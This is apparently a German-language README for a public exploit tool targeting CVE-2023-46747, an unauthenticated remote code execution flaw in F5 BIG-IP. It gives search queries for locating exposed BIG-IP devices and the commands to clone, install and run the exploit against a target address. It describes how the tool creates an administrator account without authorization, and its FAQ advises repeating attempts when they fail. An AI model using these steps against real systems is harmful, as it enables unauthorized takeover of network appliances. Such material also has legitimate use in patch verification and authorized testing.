CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. Derzeit ist der Benutzer hier nur admin :

2. Führen Sie das Skript aus:

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Erfolgreich ausgeführter Befehl:

3. Hier wurde ohne Autorisierung erfolgreich ein neuer Benutzer angelegt:

Die Ausnutzung schlägt in einigen Versionen fehl, Referenz: https://twitter.com/joel_land/status/1729147886615818732.

1. F: Der Token-Erwerb ist fehlgeschlagen?
   A: Es kann nicht gesagt werden, dass auf der Testseite keine Schwachstelle vorhanden sein darf, da das Erstellen eines Benutzers ohne Autorisierung nicht zu 100 % erfolgreich ist. Manchmal erstellen Sie aus bestimmten Gründen im ersten Schritt keinen Benutzer, sodass das Token im zweiten Schritt nicht abgerufen werden kann. Deshalb ist mein Vorschlag, es noch ein paar Mal zu versuchen. Wenn dies nicht funktioniert, liegt möglicherweise tatsächlich keine Sicherheitslücke vor.

Sie können dieses Skript https://github.com/BishopFox/bigip-scanner verwenden, um F5 BIG-IP-Versionsinformationen zu sammeln. Es ist großartig!

projectdiscovery/nuclei-templates#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747